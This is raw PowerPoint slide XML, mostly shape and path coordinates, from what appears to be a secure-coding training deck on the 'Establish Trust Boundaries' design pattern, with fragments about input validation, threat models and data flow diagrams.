                    <a:pt x="23309" y="1721601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17339" y="1661657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12260" y="1602016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8066" y="1542716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4749" y="1483794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2303" y="1425289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="722" y="1367238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1309680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128" y="1252652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1101" y="1196192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2912" y="1140339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5554" y="1085129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9021" y="1030602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13305" y="976794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18402" y="923745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24302" y="871491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31001" y="820071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38492" y="769522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46767" y="719883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55820" y="671192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65645" y="623486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76234" y="576803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87582" y="531181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99681" y="486659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112525" y="443274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126107" y="401064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140420" y="360066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155459" y="320320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171215" y="281863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187684" y="244732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204857" y="208966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222728" y="174602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260540" y="110235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301064" y="51933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322327" y="25151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344248" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="C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9435370" y="2412110"/>
              <a:ext cx="429259" cy="2314575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="429259" h="2314575">
                  <a:moveTo>
                    <a:pt x="40227" y="2314194"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="33213" y="2253675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26883" y="2193355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21232" y="2133255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16255" y="2073399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11950" y="2013810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8312" y="1954509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5337" y="1895520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3023" y="1836865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1364" y="1778568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358" y="1720650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1663135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286" y="1606045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213" y="1549402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2777" y="1493231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4974" y="1437552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7800" y="1382390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11251" y="1327766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15325" y="1273703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20016" y="1220224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25321" y="1167352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31236" y="1115110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37757" y="1063519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44881" y="1012604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52604" y="962386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60922" y="912888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69831" y="864133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79327" y="816143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89406" y="768942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100065" y="722552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111300" y="676995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123107" y="632295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135483" y="588474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148422" y="545554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161923" y="503559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175980" y="462511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190589" y="422433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205748" y="383348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221453" y="345277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237699" y="308245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254482" y="272273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271800" y="237385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289647" y="203602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326917" y="139446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366261" y="79986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407649" y="25404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429101" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="C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13400" y="2470400"/>
            <a:ext cx="3257337" cy="112302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298995" indent="-286934" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="298995" algn="l"/>
                <a:tab pos="299630" algn="l"/>
              </a:tabLst>
            </a:pP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Input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Validation</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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obviously </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>takes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  <a:p>
            <a:pPr marL="298995" defTabSz="914126"/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place on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the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 application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server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  <a:p>
            <a:pPr marL="298995" marR="175207" indent="-286934" defTabSz="914126">
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="298995" algn="l"/>
                <a:tab pos="299630" algn="l"/>
              </a:tabLst>
            </a:pP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But</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>logically,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the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5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>data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can't be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-39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trusted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until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it is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validated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86880" y="3878209"/>
            <a:ext cx="1249355" cy="848139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marR="5078" algn="just" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1799" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>We </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>trust </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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1799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srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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1799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1799" spc="-3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srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>data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94024" y="4237271"/>
            <a:ext cx="1857526" cy="848773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marR="5078" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1799" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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1799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srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>source </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-3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1799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99" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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1799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99" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>data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363369" y="4883786"/>
            <a:ext cx="4621596" cy="658958"/>
            <a:chOff x="1363725" y="4884165"/>
            <a:chExt cx="4622800" cy="659130"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="object 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1370075" y="4890515"/>
              <a:ext cx="4610100" cy="646430"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4610100" h="646429">
                  <a:moveTo>
                    <a:pt x="4610100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4610100" y="646176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610100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370075" y="4890515"/>
              <a:ext cx="4610100" cy="646430"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4610100" h="646429">
                  <a:moveTo>
                    <a:pt x="0" y="646176"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4610100" y="646176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610100" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="646176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448183" y="4909130"/>
            <a:ext cx="3918199" cy="574525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1799" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>What might</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-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799" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Boundary </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-1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799" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the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  <a:p>
            <a:pPr marL="12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1799" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>firewall?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735439" y="4433868"/>
            <a:ext cx="596110" cy="689430"/>
            <a:chOff x="5736933" y="4434130"/>
            <a:chExt cx="596265" cy="689610"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="object 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5743283" y="4580767"/>
              <a:ext cx="532130" cy="536575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="532129" h="536575">
                  <a:moveTo>
                    <a:pt x="277480" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="232016" y="2670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187662" y="13021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145462" y="30809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106457" y="55790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71689" y="87722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42201" y="126360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19892" y="169563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5899" y="214659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="260603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1967" y="306353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11578" y="350866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28607" y="393097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52830" y="432005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84022" y="466546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121957" y="495676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164536" y="517509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209116" y="530930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254658" y="536184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300125" y="533514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344479" y="523163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386682" y="505375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425695" y="480393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460482" y="448462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490003" y="409824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512275" y="366620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526238" y="321524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532115" y="275580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530132" y="229830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520510" y="185318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503475" y="143086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479249" y="104179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448056" y="69638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410120" y="40508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367575" y="18675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323014" y="5253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27748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5743283" y="4580767"/>
              <a:ext cx="532130" cy="536575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="532129" h="536575">
                  <a:moveTo>
                    <a:pt x="42201" y="126360"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71689" y="87722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106457" y="55790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145462" y="30809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187662" y="13021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232016" y="2670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277480" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323014" y="5253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367575" y="18675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410120" y="40508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448056" y="69638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479249" y="104179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503475" y="143086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520510" y="185318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530132" y="229830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532115" y="275580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526238" y="321524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512275" y="366620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490003" y="409824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460482" y="448462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425695" y="480393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386682" y="505375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344479" y="523163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300125" y="533514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254658" y="536184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209116" y="530930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164536" y="517509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121957" y="495676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84022" y="466546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52830" y="432005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28607" y="393097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11578" y="350866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1967" y="306353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="260603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5899" y="214659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19892" y="169563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42201" y="126360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9599" y="4705330"/>
              <a:ext cx="112305" cy="11230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4669" y="4797788"/>
              <a:ext cx="313392" cy="20032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8201" y="4478736"/>
              <a:ext cx="224996" cy="17197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906902" y="4434130"/>
              <a:ext cx="426084" cy="117475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="426085" h="117475">
                  <a:moveTo>
                    <a:pt x="214760" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17" y="11577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235735" y="116977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425938" y="95917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147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2195" y="4454337"/>
              <a:ext cx="333155" cy="202378"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grp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32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Common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Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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Establish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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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Boundaries</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="6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–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Security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="4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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Pattern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267123"/>
            <a:ext cx="10308445" cy="3736002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Alias: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None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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="42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often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confusion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over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what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levels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required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various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parts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 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0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requirements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get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neglected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once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Threat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Models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created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Consequences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Boundaries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easily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defined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understood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wor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wit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Dat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Fl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Diag</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-4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ams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Better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understanding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needed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components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3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Improved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handling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inter-component</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="6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relationships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33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4885494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5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5" dirty="0"/>
              <a:t>Establish</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Boundaries</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Application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9552357" cy="2717727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During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design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phase,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will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use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Threat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Models,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risk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analyses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quality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gates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determine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what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level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required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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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2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systems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70"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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2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applications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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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2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199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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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2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users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Boundaries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means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describing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requirements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52672" y="3113486"/>
            <a:ext cx="1423299" cy="1079219"/>
            <a:chOff x="8154796" y="3113404"/>
            <a:chExt cx="1423670" cy="1079500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="object 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8169401" y="3128009"/>
              <a:ext cx="1394460" cy="1050290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1394459" h="1050289">
                  <a:moveTo>
                    <a:pt x="0" y="525017"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2097" y="483990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8287" y="443826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18414" y="404641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32323" y="366554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49859" y="329680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70868" y="294136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95193" y="260039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122680" y="227506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153175" y="196653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186521" y="167598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222565" y="140456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261150" y="115346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302122" y="92383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345327" y="71684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390608" y="53366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437811" y="37546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486781" y="24341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537363" y="13867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="589402" y="6240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642742" y="1579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697229" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
